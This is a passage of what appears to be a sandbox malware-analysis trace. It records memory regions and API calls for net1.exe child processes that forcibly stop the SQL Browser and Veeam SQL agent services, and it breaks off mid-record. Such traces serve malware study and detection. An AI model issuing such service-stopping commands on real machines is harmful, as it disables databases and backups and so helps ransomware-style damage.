= private name = "private_0x000000007ffe0000" filename = "" Region: id = 10587 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 10588 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10589 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10590 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 10591 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 10592 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 10593 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10594 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 793 os_tid = 0x95c Process: id = "294" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x59f69000" os_pid = "0xba8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "291" os_parent_pid = "0x9b8" cmd_line = "C:\\Windows\\system32\\net1 stop SQLBrowser /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10615 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10616 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10617 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10618 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 10619 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10620 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10621 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10622 start_va = 0xff3d0000 end_va = 0xff402fff entry_point = 0xff3d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 10623 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10624 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10625 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 10626 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10627 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 10628 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10629 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10630 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10631 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10632 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10633 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 10634 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 10635 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10636 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10637 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 10638 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10639 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10640 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10641 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10642 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10643 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10644 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10645 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10646 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10647 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10648 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10649 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10650 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10651 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10652 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10926 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 795 os_tid = 0x7b4 [0113.263] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f8f0 | out: lpSystemTimeAsFileTime=0x14f8f0*(dwLowDateTime=0xf8a93fb0, dwHighDateTime=0x1d48689)) [0113.263] GetCurrentProcessId () returned 0xba8 [0113.263] GetCurrentThreadId () returned 0x7b4 [0113.263] GetTickCount () returned 0x26038 [0113.263] QueryPerformanceCounter (in: lpPerformanceCount=0x14f8f8 | out: lpPerformanceCount=0x14f8f8*=1816018100000) returned 1 [0113.265] GetModuleHandleW (lpModuleName=0x0) returned 0xff3d0000 [0113.265] __set_app_type (_Type=0x1) [0113.265] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff3e9c9c) returned 0x0 [0113.265] __getmainargs (in: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788, _DoWildCard=0, _StartInfo=0xff3f479c | out: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788) returned 0 [0113.265] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.265] GetConsoleOutputCP () returned 0x1b5 [0113.620] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff3fcec0 | out: lpCPInfo=0xff3fcec0) returned 1 [0113.621] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0113.623] sprintf_s (in: _DstBuf=0x14f898, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0113.623] setlocale (category=0, locale=".437") returned="English_United States.437" [0113.624] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0113.624] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0113.624] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLBrowser /y" [0113.624] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f630, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0113.625] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0113.625] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14f888 | out: Buffer=0x14f888*=0x284d50) returned 0x0 [0113.625] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14f888 | out: Buffer=0x14f888*=0x28c0f0) returned 0x0 [0113.625] _fileno (_File=0x7fefdba2a80) returned 0 [0113.625] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0113.625] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0113.625] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0113.625] _wcsicmp (_String1="config", _String2="stop") returned -16 [0113.625] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0113.625] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0113.625] _wcsicmp (_String1="file", _String2="stop") returned -13 [0113.625] _wcsicmp (_String1="files", _String2="stop") returned -13 [0113.625] _wcsicmp (_String1="group", _String2="stop") returned -12 [0113.625] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0113.625] _wcsicmp (_String1="help", _String2="stop") returned -11 [0113.625] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0113.625] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0113.625] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0113.625] _wcsicmp (_String1="session", _String2="stop") returned -15 [0113.625] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0113.625] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0113.626] _wcsicmp (_String1="share", _String2="stop") returned -12 [0113.626] _wcsicmp (_String1="start", _String2="stop") returned -14 [0113.626] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0113.626] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0113.626] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0113.626] _wcsicmp (_String1="accounts", _String2="SQLBrowser") returned -18 [0113.626] _wcsicmp (_String1="computer", _String2="SQLBrowser") returned -16 [0113.626] _wcsicmp (_String1="config", _String2="SQLBrowser") returned -16 [0113.626] _wcsicmp (_String1="continue", _String2="SQLBrowser") returned -16 [0113.626] _wcsicmp (_String1="cont", _String2="SQLBrowser") returned -16 [0113.626] _wcsicmp (_String1="file", _String2="SQLBrowser") returned -13 [0113.626] _wcsicmp (_String1="files", _String2="SQLBrowser") returned -13 [0113.626] _wcsicmp (_String1="group", _String2="SQLBrowser") returned -12 [0113.626] _wcsicmp (_String1="groups", _String2="SQLBrowser") returned -12 [0113.626] _wcsicmp (_String1="help", _String2="SQLBrowser") returned -11 [0113.626] _wcsicmp (_String1="helpmsg", _String2="SQLBrowser") returned -11 [0113.626] _wcsicmp (_String1="localgroup", _String2="SQLBrowser") returned -7 [0113.626] _wcsicmp (_String1="pause", _String2="SQLBrowser") returned -3 [0113.626] _wcsicmp (_String1="session", _String2="SQLBrowser") returned -12 [0113.626] _wcsicmp (_String1="sessions", _String2="SQLBrowser") returned -12 [0113.626] _wcsicmp (_String1="sess", _String2="SQLBrowser") returned -12 [0113.626] _wcsicmp (_String1="share", _String2="SQLBrowser") returned -9 [0113.626] _wcsicmp (_String1="start", _String2="SQLBrowser") returned 3 [0113.626] _wcsicmp (_String1="stats", _String2="SQLBrowser") returned 3 [0113.626] _wcsicmp (_String1="statistics", _String2="SQLBrowser") returned 3 [0113.626] _wcsicmp (_String1="stop", _String2="SQLBrowser") returned 3 [0113.626] _wcsicmp (_String1="time", _String2="SQLBrowser") returned 1 [0113.626] _wcsicmp (_String1="user", _String2="SQLBrowser") returned 2 [0113.626] _wcsicmp (_String1="users", _String2="SQLBrowser") returned 2 [0113.626] _wcsicmp (_String1="msg", _String2="SQLBrowser") returned -6 [0113.626] _wcsicmp (_String1="messenger", _String2="SQLBrowser") returned -6 [0113.626] _wcsicmp (_String1="receiver", _String2="SQLBrowser") returned -1 [0113.626] _wcsicmp (_String1="rcv", _String2="SQLBrowser") returned -1 [0113.627] _wcsicmp (_String1="netpopup", _String2="SQLBrowser") returned -5 [0113.627] _wcsicmp (_String1="redirector", _String2="SQLBrowser") returned -1 [0113.627] _wcsicmp (_String1="redir", _String2="SQLBrowser") returned -1 [0113.627] _wcsicmp (_String1="rdr", _String2="SQLBrowser") returned -1 [0113.627] _wcsicmp (_String1="workstation", _String2="SQLBrowser") returned 4 [0113.627] _wcsicmp (_String1="work", _String2="SQLBrowser") returned 4 [0113.627] _wcsicmp (_String1="wksta", _String2="SQLBrowser") returned 4 [0113.627] _wcsicmp (_String1="prdr", _String2="SQLBrowser") returned -3 [0113.627] _wcsicmp (_String1="devrdr", _String2="SQLBrowser") returned -15 [0113.627] _wcsicmp (_String1="lanmanworkstation", _String2="SQLBrowser") returned -7 [0113.627] _wcsicmp (_String1="server", _String2="SQLBrowser") returned -12 [0113.627] _wcsicmp (_String1="svr", _String2="SQLBrowser") returned 5 [0113.627] _wcsicmp (_String1="srv", _String2="SQLBrowser") returned 1 [0113.627] _wcsicmp (_String1="lanmanserver", _String2="SQLBrowser") returned -7 [0113.627] _wcsicmp (_String1="alerter", _String2="SQLBrowser") returned -18 [0113.627] _wcsicmp (_String1="netlogon", _String2="SQLBrowser") returned -5 [0113.627] _wcsupr (in: _String="SQLBrowser" | out: _String="SQLBROWSER") returned="SQLBROWSER" [0113.627] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x28ce00 [0113.631] GetServiceKeyNameW (in: hSCManager=0x28ce00, lpDisplayName="SQLBROWSER", lpServiceName=0xff3f5750, lpcchBuffer=0x14f7a8 | out: lpServiceName="", lpcchBuffer=0x14f7a8) returned 0 [0113.633] _wcsicmp (_String1="msg", _String2="SQLBROWSER") returned -6 [0113.633] _wcsicmp (_String1="messenger", _String2="SQLBROWSER") returned -6 [0113.633] _wcsicmp (_String1="receiver", _String2="SQLBROWSER") returned -1 [0113.633] _wcsicmp (_String1="rcv", _String2="SQLBROWSER") returned -1 [0113.633] _wcsicmp (_String1="redirector", _String2="SQLBROWSER") returned -1 [0113.633] _wcsicmp (_String1="redir", _String2="SQLBROWSER") returned -1 [0113.633] _wcsicmp (_String1="rdr", _String2="SQLBROWSER") returned -1 [0113.633] _wcsicmp (_String1="workstation", _String2="SQLBROWSER") returned 4 [0113.633] _wcsicmp (_String1="work", _String2="SQLBROWSER") returned 4 [0113.633] _wcsicmp (_String1="wksta", _String2="SQLBROWSER") returned 4 [0113.633] _wcsicmp (_String1="prdr", _String2="SQLBROWSER") returned -3 [0113.633] _wcsicmp (_String1="devrdr", _String2="SQLBROWSER") returned -15 [0113.633] _wcsicmp (_String1="lanmanworkstation", _String2="SQLBROWSER") returned -7 [0113.633] _wcsicmp (_String1="server", _String2="SQLBROWSER") returned -12 [0113.633] _wcsicmp (_String1="svr", _String2="SQLBROWSER") returned 5 [0113.633] _wcsicmp (_String1="srv", _String2="SQLBROWSER") returned 1 [0113.633] _wcsicmp (_String1="lanmanserver", _String2="SQLBROWSER") returned -7 [0113.633] _wcsicmp (_String1="alerter", _String2="SQLBROWSER") returned -18 [0113.633] _wcsicmp (_String1="netlogon", _String2="SQLBROWSER") returned -5 [0113.633] NetServiceControl (in: servername=0x0, service="SQLBROWSER", opcode=0x0, arg=0x0, bufptr=0x14f7b0 | out: bufptr=0x14f7b0) returned 0x889 [0113.634] wcscpy_s (in: _Destination=0xff3f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0113.634] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0113.635] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0113.636] GetFileType (hFile=0xb) returned 0x2 [0113.636] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f678 | out: lpMode=0x14f678) returned 1 [0113.637] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x14f670, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0x14f670*=0x1e) returned 1 [0113.637] GetFileType (hFile=0xb) returned 0x2 [0113.637] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f678 | out: lpMode=0x14f678) returned 1 [0113.637] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f670, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0x14f670*=0x2) returned 1 [0113.637] _ultow (in: _Dest=0x889, _Radix=1373920 | out: _Dest=0x889) returned="2185" [0113.637] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0113.638] GetFileType (hFile=0xb) returned 0x2 [0113.638] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f678 | out: lpMode=0x14f678) returned 1 [0113.638] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14f670, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0x14f670*=0x34) returned 1 [0113.638] GetFileType (hFile=0xb) returned 0x2 [0113.638] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f678 | out: lpMode=0x14f678) returned 1 [0113.638] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f670, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0x14f670*=0x2) returned 1 [0113.639] NetApiBufferFree (Buffer=0x284d50) returned 0x0 [0113.639] NetApiBufferFree (Buffer=0x28c0f0) returned 0x0 [0113.639] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLBrowser /y" [0113.639] exit (_Code=2) Process: id = "295" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x679be000" os_pid = "0x1320" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "287" os_parent_pid = "0x1224" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10653 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10654 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10655 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10656 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 10657 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10658 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10659 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10660 start_va = 0xff3d0000 end_va = 0xff402fff entry_point = 0xff3d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 10661 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10662 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10663 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 10664 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10665 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 10666 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10667 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10668 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10669 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10670 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10671 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 10672 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 10673 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10674 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10675 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 10676 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10677 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10678 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10679 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10680 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10681 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10682 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10683 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10684 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10685 start_va = 0x7fefdb10000 end_va = 